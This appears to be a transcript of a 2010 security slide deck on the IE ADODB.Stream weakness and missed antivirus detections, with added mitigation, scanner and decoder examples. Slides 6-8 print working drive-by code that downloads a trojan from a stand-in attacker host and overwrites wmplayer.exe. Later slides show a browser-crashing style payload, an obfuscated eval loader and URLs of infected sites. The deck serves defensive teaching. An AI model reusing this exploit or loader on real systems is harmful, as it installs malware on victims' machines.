
Shasta Console Operations


Presentation Transcript


  1. Shasta Console Operations February 2010 Tony Caleb

  2. Agenda
     • MSIE ADODB.Stream Object Installation Weakness
     • AV/IS FN Detection
     • Dynamic Analysis

  3. Introduction
     • The MSIE ADODB.Stream Object Installation Weakness is a browser exploit: it lets an attacker compromise a system through the browser, install ActiveX controls and take over the victim's machine.
     • "This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening." - SYMANTEC
     • "ADODB.Stream provides a method for reading and writing files on a hard drive. This by-design functionality is sometimes used by web applications. However, when combined with known security vulnerabilities in Microsoft Internet Explorer, it could allow an Internet web site to execute script from the Local Machine Zone (LMZ). This occurs because the ADODB.Stream object allows access to the hard drive when hosted within Internet Explorer." - MICROSOFT
     • "This weakness depends on scripting that abuses the ADODB.Stream Object to write an attacker-specified file to the victim file system." - SECURITY FOCUS

  4. How does it occur?
     • Microsoft Internet Explorer is prone to a security weakness that may permit malicious HTML documents to create or overwrite files on a victim's file system when they are interpreted from the Local Zone (or from other Security Zones with relaxed security restrictions, such as the Intranet Zone).

  5. What does it do on an infected machine?
     • This weakness depends on scripting that abuses the ADODB.Stream Object to write an attacker-specified file to the victim's file system. In this way, an HTML document interpreted in the context of a Security Zone with relaxed security restrictions can install a malicious file on the victim's file system.
     • The stream object contains several methods for reading and writing binary and text files. When this by-design functionality is combined with known security vulnerabilities in Microsoft Internet Explorer, an Internet web site can execute script from the Local Machine zone. This happens because the ADODB.Stream object permits access to the hard disk when it is hosted in Internet Explorer.
     • An error is displayed on the page while the script executes. It makes the user think that a simple error has occurred and the page did not load, while the malicious content is downloaded onto the system without the user's knowledge.
     • error.jsp is a JSP page that consists of one line, namely <% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %> (just to send a false header to IE).

  6. Sample Code • How a file is downloaded onto a victim's system
     const adTypeBinary = 1
     const adSaveCreateOverwrite = 2
     const adModeReadWrite = 3
     set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
     xmlHTTP.open "GET","http://ip3e83566f.speed.planet.nl/NOTEPAD.EXE",false
     xmlHTTP.send
     contents = xmlHTTP.responseBody
     Set oStr = CreateObject("ADODB.Stream")
     oStr.Mode = adModeReadWrite
     oStr.Type = adTypeBinary
     oStr.Open
     oStr.Write(contents)
     oStr.SaveToFile "c:\\test.exe", adSaveCreateOverwrite
     </script>

  7. Sample Code • How this exploit can be aimed at wmplayer.exe
     var x = new ActiveXObject("Microsoft.XMLHTTP");
     x.Open("GET", "http://attacker/trojan.exe",0);
     x.Send();
     var s = new ActiveXObject("ADODB.Stream");
     s.Mode = 3;
     s.Type = 1;
     s.Open();
     s.Write(x.responseBody);
     s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
     location.href = "mms://";

  8. Modification of wmplayer.exe • Code for the modification of Windows Media Player
     <script language="javascript">
     function preparecode(code) {
       result = '';
       lines = code.split(/\r\n/);
       for (i=0;i<lines.length;i++) {
         line = lines[i];
         if (line != '') {
           result += line +'\\r\\n';
         }
       }
       return result;
     }
     function doit() {
       mycode = preparecode(document.all.code.value);
       myURL = "file:javascript:eval('" + mycode + "')";
       window.open(myURL,"_media")
     }
     window.open("error.jsp","_media");
     setTimeout("doit()", 5000);
     </script>

  9. How to Overcome This Issue
     Changing the keys in the Registry
     • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}
     Disabling ActiveX controls
     • Disable all ActiveX controls in the IE security settings, so that nothing can be downloaded automatically (this is not possible in older versions of Internet Explorer).

  10. Changing the keys in the Registry
     • Close any open Internet Explorer browser windows.
     • Click Start, and then click Run.
     • In the Open box, type Regedit, and then click OK.
     • In Registry Editor, locate the following registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility
     • Right-click ActiveX Compatibility, point to New, and then click Key.
     • Type the following name for the key: {00000566-0000-0010-8000-00AA006D2EA4}
     • Close Registry Editor.
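The same mitigation as a .reg file that can be imported on many machines at once (an added example, not part of the slides). The slide's steps only create the key; the "Compatibility Flags" DWORD with bit 0x400 is the ActiveX kill-bit convention from Microsoft's documentation and is assumed here, since the slide does not mention it.

```ini
Windows Registry Editor Version 5.00

; Kill bit for ADODB.Stream (CLSID taken from slide 9).
; Bit 0x400 in "Compatibility Flags" tells Internet Explorer never to
; instantiate this control; on 64-bit Windows the same key also exists
; under SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}]
"Compatibility Flags"=dword:00000400
```

Verify after import with `reg query "HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}"` and confirm the value reads 0x400.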

  11. Samples of FN Detection
     MSIE Event Object Mem Corruption Code Exec
     • The domain khan.co.kr with the URL http://gallery.khan.co.kr/ is found to carry the above threat, but during manual analysis of this URL NIS does not detect it. Here the attackers have bypassed the AV/IS.
     HTTP MSIE Style Tag Cmt Mem Corruption
     • The domain Voy.com with the URL http://www.voy.com//76583 is found to carry the above threat, but during manual analysis of this URL the AV/IS fails to detect it.
     Trojan.Malscript.B
     • This is a common FN that we find with IS.
     • Here a script that redirects to malicious links is served in encoded form; since the redirect link is not active when NIS inspects it, it goes undetected, and the link changes dynamically.
     • This clearly shows that the malicious content is intentional, since the script tag is placed after the closing html tag.

  12. MSIE Event Object Mem Corruption Code Exec

  13. MSIE Event Object Mem Corruption Code Exec

  14. MSIE Event Object Mem Corruption Code Exec • Code in the index2.html: a packed script of the form eval(function(p,a,c,k,e,d){...})(...) (packed body omitted)

  15. MSIE Event Object Mem Corruption Code Exec • Code in the index2.html (continued)

  16. HTTP MSIE Style Tag Cmt Mem Corruption
     The /* is closed only after the end of the style tag, that is after 80,000 lines of garbage. Because of this inserted junk the memory stack overflows and, as a result, the entire browser crashes.
     URL: hxxp://www.voy.com//76583/
     <!-- google_ad_section_start -->
     <style type=text/css>body{background-repeat:repeat;background-color:black;background-image:none;color:black;visibility:hidden;font-size:10000;line-height:10000;letter-spacing:10000;text-decoration:blink;text-align:right;margin-top:10000;}form{visibility:hidden;}table{visibility:hidden;}a{visibility:hidden;}img{visibility:hidden;}input{visibility:hidden;}</style>
     <A rel=nofollow target=_blank HREF=https:???????????????????????????????????????????? >
     <style>@;/*<<BR>
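The three page-structure clues the FN slides point at (slide 11: a script tag after the closing html tag; slide 14: a p,a,c,k,e,d packer inside eval(); slide 16: a /* opened in a style block and not closed before the style tag ends) can be turned into a static triage check. This is an added example, not code from the presentation; the HTML samples are constructed stand-ins, not content from the sites named on the slides.

```python
import re

# Constructed sample pages, each carrying one of the patterns described on the slides.
SCRIPT_AFTER_HTML = "<html><body>page</body></html>\n<script>x=1</script>"
PACKED_EVAL = ("<html><body><script>eval(function(p,a,c,k,e,d){return p}"
               "('g a=1b;',62,9,'x'.split('|'),0,{}))</script></body></html>")
UNCLOSED_STYLE_COMMENT = ("<html><body><style>body{visibility:hidden;font-size:10000;}"
                          "</style><style>@;/*" + "garbage\n" * 50 + "</style></body></html>")
TRUNCATED_STYLE = "<html><body><style>@;/*" + "garbage\n" * 10   # no closing tags at all
CLEAN = ("<html><head><style>p{color:red}/* ok */</style></head>"
         "<body><script>var a=1;</script></body></html>")

# Wrapper signature of the packed script shown on slide 14.
PACKER_RE = re.compile(
    r"eval\s*\(\s*function\s*\(\s*p\s*,\s*a\s*,\s*c\s*,\s*k\s*,\s*e\s*,\s*d\s*\)", re.I)
STYLE_OPEN_RE = re.compile(r"<style\b[^>]*>", re.I)
STYLE_CLOSE_RE = re.compile(r"</style>", re.I)


def scan_html(html):
    """Return the list of suspicious structural patterns found in one HTML document."""
    findings = []
    # Slide 11: anything that looks like a <script> after the last </html>.
    end = html.lower().rfind("</html>")
    if end != -1 and re.search(r"<script\b", html[end:], re.I):
        findings.append("script tag after closing html tag")
    # Slide 14: eval() applied to a p,a,c,k,e,d packer.
    if PACKER_RE.search(html):
        findings.append("p,a,c,k,e,d packer wrapped in eval")
    # Slide 16: a /* inside <style> with no */ before </style> (or before end of file).
    for m in STYLE_OPEN_RE.finditer(html):
        close = STYLE_CLOSE_RE.search(html, m.end())
        css = html[m.end():close.start()] if close else html[m.end():]
        if "/*" in css and "*/" not in css.split("/*", 1)[1]:
            findings.append("unterminated /* comment inside style block")
            break
    return findings


if __name__ == "__main__":
    for name in ("SCRIPT_AFTER_HTML", "PACKED_EVAL", "UNCLOSED_STYLE_COMMENT",
                 "TRUNCATED_STYLE", "CLEAN"):
        print(name, "->", scan_html(globals()[name]))
```

Such checks only rank pages for manual analysis; the slides show the AV/IS signatures themselves missed these URLs, so a hit here is a reason to open the tools from slide 18, not a verdict.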

  17. Manual Analysis
     • How we do the manual analysis
     • Tools we use for manual analysis
     • Samples

  18. Tools Used for Manual Analysis
     • HTTP Analyzer
     • TCP Viewer
     • Process Explorer
     • Systracer (System Tracer)
     • Start-up programs (msconfig, services.msc)

  19. HTTP Malicious Toolkit Variant Activity
     From URL:
     <script language=JavaScript>
     function bfbn15(p){
       var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,
           t=Array(63,31,62,3,50,13,56,52,26,53,0,0,0,0,0,0,30,58,61,15,25,14,41,59,1,51,47,10,54,29,24,57,43,49,42,34,19,55,38,28,32,20,40,0,0,0,0,46,0,17,48,18,44,36,22,5,7,35,11,37,2,27,0,8,39,23,6,33,45,16,21,9,60,4,12);
       for(i=Math.ceil(h/k);i>0;i--){
         c='';
         for(s=Math.min(h,k);s>0;s--,h--){
           j|=(t[p.charCodeAt(z++)-48])<<d;
           if(d){c+=String.fromCharCode(129^j&255);j>>=8;d-=2}else{d=6}
         }
         eval(c);
       }
     }
     bfbn15('Li2GkG_BJK1BXqCB4IPFgG2GemR_kG_67IEOJq0PLCCA9T@RVLjApCC6dT@ZJ3EGeIm_pC2OXj@Z4CJ6xE8A9q1xGARPV3@Be1PAJS2GpG_P9GRJVRKIXq1AJEJG70@OF4z69p2PI32GkGEGFSARUfm_QSRRVVGOi1E6SmRRVE8ZLi@O9pEJbVmdsVEOZm@A9IPdUrRx9i1GeIGZki_xQUE66JGG_0EOi2mJ_S2OI3EGe0PFZl')
     </script>
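The bfbn15 routine above is a custom base64-style decoder: every 4 symbols from a 75-entry alphabet ('0' to 'z') become 3 bytes, each XORed with 129, and the result goes straight to eval(). The usual analyst move is to re-implement it with eval() replaced by "return", so the hidden script can be read offline. The following is an added example written for this page, not the slide's code; the table is copied from the slide, and the test vector "FT@GtGE" is a constructed input that encodes "hello" under this scheme.

```python
# Substitution table from slide 19: index = ord(ch) - 48, covering '0'..'z'.
BFBN15_TABLE = [63,31,62,3,50,13,56,52,26,53,0,0,0,0,0,0,30,58,61,15,25,14,41,59,1,51,
                47,10,54,29,24,57,43,49,42,34,19,55,38,28,32,20,40,0,0,0,0,46,0,17,48,18,
                44,36,22,5,7,35,11,37,2,27,0,8,39,23,6,33,45,16,21,9,60,4,12]

# Encoded argument exactly as it appears on slide 19 (copied from the transcript).
SLIDE19_PAYLOAD = ("Li2GkG_BJK1BXqCB4IPFgG2GemR_kG_67IEOJq0PLCCA9T@RVLjApCC6dT@ZJ3EGeIm_pC2OXj@Z"
                   "4CJ6xE8A9q1xGARPV3@Be1PAJS2GpG_P9GRJVRKIXq1AJEJG70@OF4z69p2PI32GkGEGFSARUfm_"
                   "QSRRVVGOi1E6SmRRVE8ZLi@O9pEJbVmdsVEOZm@A9IPdUrRx9i1GeIGZki_xQUE66JGG_0EOi2mJ_"
                   "S2OI3EGe0PFZl")


def bfbn15_decode(payload):
    """Return the bytes the original bfbn15() would have handed to eval().

    Mirrors the slide's loop: j accumulates 6-bit symbols shifted by d; whenever d is
    non-zero a byte is emitted as 129 ^ (j & 255). The original eval()s every 1024
    input symbols, but the bit state carries across chunks, so one pass gives the
    same concatenated output.
    """
    out = bytearray()
    j = d = 0
    for ch in payload:
        idx = ord(ch) - 48
        if not 0 <= idx < len(BFBN15_TABLE):
            # The JavaScript silently treats out-of-range symbols as 0; fail loudly instead.
            raise ValueError("character %r is outside the bfbn15 alphabet" % ch)
        j |= BFBN15_TABLE[idx] << d
        if d:
            out.append(129 ^ (j & 255))
            j >>= 8
            d -= 2
        else:
            d = 6   # first symbol of each 4-symbol group only primes the accumulator
    return bytes(out)


if __name__ == "__main__":
    # latin-1 maps every byte, so the recovered script prints even if the transcript
    # altered a character of the payload.
    print(bfbn15_decode(SLIDE19_PAYLOAD).decode("latin-1"))
```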

  20. HTTP Malicious Toolkit Variant Activity

  21. HTTP Malicious Toolkit Variant Activity

  22. Thank You
